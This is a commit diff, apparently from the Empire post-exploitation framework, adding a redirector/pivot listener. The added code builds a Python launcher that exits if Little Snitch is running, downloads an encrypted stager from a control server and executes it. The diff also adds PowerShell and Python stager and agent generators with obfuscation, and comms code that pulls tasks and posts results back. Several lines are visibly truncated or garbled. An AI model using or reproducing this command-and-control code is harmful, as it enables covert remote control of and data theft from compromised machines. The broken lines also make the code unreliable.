Added redirector listener. Complete
@ -90,7 +90,7 @@ class MainMenu(cmd.Cmd):
dispatcher.connect(self.handle_event, sender=dispatcher.Any)
# Main, Agents, or Listeners
# Main, Agents, or
self.menu_state = 'Main'
# parse/handle any passed command line arguments
@ -102,8 +102,8 @@ class MainMenu(cmd.Cmd):
self.modules = modules.Modules(self, args=args)
self.listeners = listeners.Listeners(self, args=args)
self.resourceQueue = []
#A hashtable of autruns based on agent language
self.autoRuns = {}
#A hashtable of autruns based on agent language
self.autoRuns = {}
@ -557,16 +557,18 @@ def get_listener_options(listenerName):
Returns the options for a specified listenername from the database outside
of the normal menu execution.
conn = sqlite3.connect('./data/empire.db', check_same_thread=False)
conn.isolation_level = None
conn.row_factory = dict_factory
cur = conn.cursor()
cur.execute("SELECT options FROM listeners WHERE name = ?", [listenerName] )
result = cur.fetchone()
return pickle.loads(result['options'])
conn = sqlite3.connect('./data/empire.db', check_same_thread=False)
conn.isolation_level = None
conn.row_factory = dict_factory
cur = conn.cursor()
cur.execute("SELECT options FROM listeners WHERE name = ?", [listenerName] )
result = cur.fetchone()
return pickle.loads(result['options'])
except Exception:
return None
def get_datetime():
@ -228,6 +228,7 @@ class Listeners:
moduleName = result['module']
nameBase = listenerName
i = 1
while listenerName in self.activeListeners.keys():
listenerName = "%s%s" % (nameBase, i)
@ -242,7 +243,10 @@ class Listeners:
listenerModule.options[option] = value
print helpers.color("[*] Starting listener '%s'" % (listenerName))
success = listenerModule.start(name=listenerName)
if moduleName == 'redirector':
success = True
success = listenerModule.start(name=listenerName)
if success:
print helpers.color('[+] Listener successfully started!')
@ -278,6 +282,15 @@ class Listeners:
return False
# shut down the listener and remove it from the cache
if self.mainMenu.listeners.get_listener_module(listenerName) == 'redirector':
# remove the listener object from the internal cache
del self.activeListeners[listenerName]
self.conn.row_factory = None
cur = self.conn.cursor()
cur.execute("DELETE FROM listeners WHERE name=?", [listenerName])
# remove the listener from the database
@ -307,6 +320,10 @@ class Listeners:
activeListenerModuleName = self.activeListeners[listenerName]['moduleName']
activeListenerModule = self.loadedListeners[activeListenerModuleName]
if activeListenerModuleName == 'redirector':
print helpers.color("[!] skipping redirector listener %s. Start/Stop actions can only initiated by the user." % (listenerName))
# signal the listener module to shut down the thread for this particular listener instance
@ -32,8 +32,8 @@ class Listener:
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent name that will serve as the internal pivot',
'Name' : {
'Description' : 'Listener name. This needs to be the name of the agent that will serve as the internal pivot',
'Required' : True,
'Value' : ""
@ -42,7 +42,7 @@ class Listener:
'Required' : True,
'Value' : ''
'Port' : {
'ListenPort' : {
'Description' : 'Port for the agent to listen on.',
'Required' : True,
'Value' : 80
@ -241,7 +241,101 @@ class Listener:
if language.startswith('py'):
# Python
return ''
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
launcherBase += "out =\n"
launcherBase += "ps.stdout.close()\n"
launcherBase += "if\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"session=%s\");\n" % (b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
proto = proxy.Split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
launcherBase += "o = urllib2.build_opener(proxy);\n"
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
return launcher
return launcherBase
print helpers.color("[!] listeners/template generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module.")
@ -255,8 +349,114 @@ class Listener:
If you want to support staging for the listener module, generate_stager must be
implemented to return the stage1 key-negotiation stager code.
print helpers.color("[!] generate_stager() not implemented for listeners/template")
return ''
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager =
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
if customHeaders != []:
headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
# read in the stager base
f = open("%s/data/agent/stagers/" % (self.mainMenu.installPath))
stager =
stager = helpers.strip_python_comments(stager)
if host.endswith("/"):
host = host[0:-1]
if workingHours != "":
stager = stager.replace('SET_WORKINGHOURS', workingHours)
if killDate != "":
stager = stager.replace('SET_KILLDATE', killDate)
# # patch the server and key information
stager = stager.replace("REPLACE_STAGING_KEY", stagingKey)
stager = stager.replace("REPLACE_PROFILE", profile)
stager = stager.replace("index.jsp", stage1)
stager = stager.replace("index.php", stage2)
# # base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
# otherwise return the standard stager
return stager
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
@ -264,8 +464,74 @@ class Listener:
If you want to support staging for the listener module, generate_agent must be
implemented to return the actual staged agent code.
print helpers.color("[!] generate_agent() not implemented for listeners/template")
return ''
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code =
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/")
code =
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
@ -278,16 +544,52 @@ class Listener:
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
function script:Get-Task {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
$script:Headers.GetEnumerator() | % {$wc.Headers.Add($_.Name, $_.Value)}
$wc.Headers.Add("Cookie", "session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $wc.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
@ -296,20 +598,106 @@ class Listener:
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$wc = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$wc.Proxy = $Script:Proxy;
$wc.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$wc.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $wc.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
return updateServers + getTask + sendMessage + "\n'New agent comms registered!'"
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
# send_message()
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = "session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
return updateServers + sendMessage
print helpers.color("[!] listeners/template generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module.")
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
print helpers.color('[!] listeners/template generate_comms(): no language specified!')
print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start(self, name=''):
@ -318,18 +706,19 @@ class Listener:
here and the actual server code in another function to facilitate threading
(i.e. start_server() in the http listener).
tempOptions = copy.deepcopy(self.options)
listenerName = self.options['Listener']['Value']
# validate that the Listener does exist
if self.mainMenu.listeners.is_listener_valid(listenerName):
# check if a listener for the agent already exists
if self.mainMenu.listeners.is_listener_valid(tempOptions['Agent']['Value']):
print helpers.color("[!] Pivot listener already exists on agent %s" % (tempOptions['Agent']['Value']))
if self.mainMenu.listeners.is_listener_valid(tempOptions['Name']['Value']):
print helpers.color("[!] Pivot listener already exists on agent %s" % (tempOptions['Name']['Value']))
return False
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
sessionID = self.mainMenu.agents.get_agent_id_db(tempOptions['Agent']['Value'])
sessionID = self.mainMenu.agents.get_agent_id_db(tempOptions['Name']['Value'])
isElevated = self.mainMenu.agents.is_agent_elevated(sessionID)
if self.mainMenu.agents.is_agent_present(sessionID) and isElevated:
@ -407,7 +796,7 @@ class Listener:
script += " -ConnectHost %s" % (listenerOptions['Host']['Value'])
script += " -ListenPort %s" % (tempOptions['Port']['Value'])
script += " -ListenPort %s" % (tempOptions['ListenPort']['Value'])
# clone the existing listener options
self.options = copy.deepcopy(listenerOptions)
@ -415,14 +804,14 @@ class Listener:
for option, values in self.options.iteritems():
if option.lower() == 'name':
self.options[option] = sessionID
self.options[option]['Value'] = sessionID
elif option.lower() == 'host':
if self.options[option]['Value'].startswith('https://'):
host = "https://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['Port']['Value'])
host = "https://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['ListenPort']['Value'])
self.options[option]['Value'] = host
host = "http://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['Port']['Value'])
host = "http://%s:%s" % (tempOptions['internalIP']['Value'], tempOptions['ListenPort']['Value'])
self.options[option]['Value'] = host
@ -430,14 +819,14 @@ class Listener:
if "Host" not in self.options.keys():
self.options['Host']['Value'] = host
self.mainMenu.agents.add_agent_task_db(tempOptions['Agent']['Value'], "TASK_SHELL", script)
self.mainMenu.agents.add_agent_task_db(tempOptions['Name']['Value'], "TASK_SHELL", script)
msg = "Tasked agent to install Pivot listener "
self.mainMenu.agents.save_agent_log(tempOptions['Agent']['Value'], msg)
self.mainMenu.agents.save_agent_log(tempOptions['Name']['Value'], msg)
return True
elif self.mainMenu.agents.get_language_db(self.options['Agent']['Value']).startswith('py'):
elif self.mainMenu.agents.get_language_db(self.options['Name']['Value']).startswith('py'):
# not implemented
script = """
@ -453,10 +842,6 @@ class Listener:
print helpers.color("[!] Agent is not present in the cache")
return False
return True
def shutdown(self, name=''):
@ -556,17 +941,5 @@ class Listener:
print helpers.color("[!] Agent is not present in the cache or not elevated")
# if name and name != '':
# print helpers.color("[!] Killing listener '%s'" % (name))
# self.threads[name].kill()
# else:
# print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
# self.threads[self.options['Name']['Value']].kill()
Reference in New Issue